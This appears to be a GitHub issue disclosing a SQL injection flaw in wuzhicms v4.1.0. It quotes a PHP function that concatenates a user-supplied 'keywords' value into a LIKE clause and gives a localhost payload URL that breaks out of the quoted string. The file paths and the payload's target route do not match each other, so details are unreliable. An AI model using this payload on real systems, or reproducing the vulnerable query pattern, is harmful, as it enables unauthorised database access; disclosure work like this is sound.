Skip to content

wuzhicms v4.1.0 /coreframe/app/core/admin/copyfrom.php sql injection vulnerability #166

Open
@letmejustdoit

Description

@letmejustdoit

Vulnerability file: /coreframe/app/coupon/admin/copyfrom.php:22
public function listing() {  
       $siteid = get_cookie('siteid');  
       $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;  
       $page = max($page,1);  
       if(isset($GLOBALS['keywords'])) {  
           $keywords = $GLOBALS['keywords'];  
           $where = "name LIKE '%$keywords%'";  
       } else {  
           $where = '';  
       }  
   $result = $this->db->get_list('copyfrom', $where, '*', 0, 20,$page);  
 $pages = $this->db->pages;  
       $total = $this->db->number;  
   include $this->template('copyfrom_listing');  
}  

Payload:
http://127.0.0.1/index.php?m=promote&f=index&v=search&_su=wuzhicms
1
&fieldtype=place&keywords=1111%'*%23

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions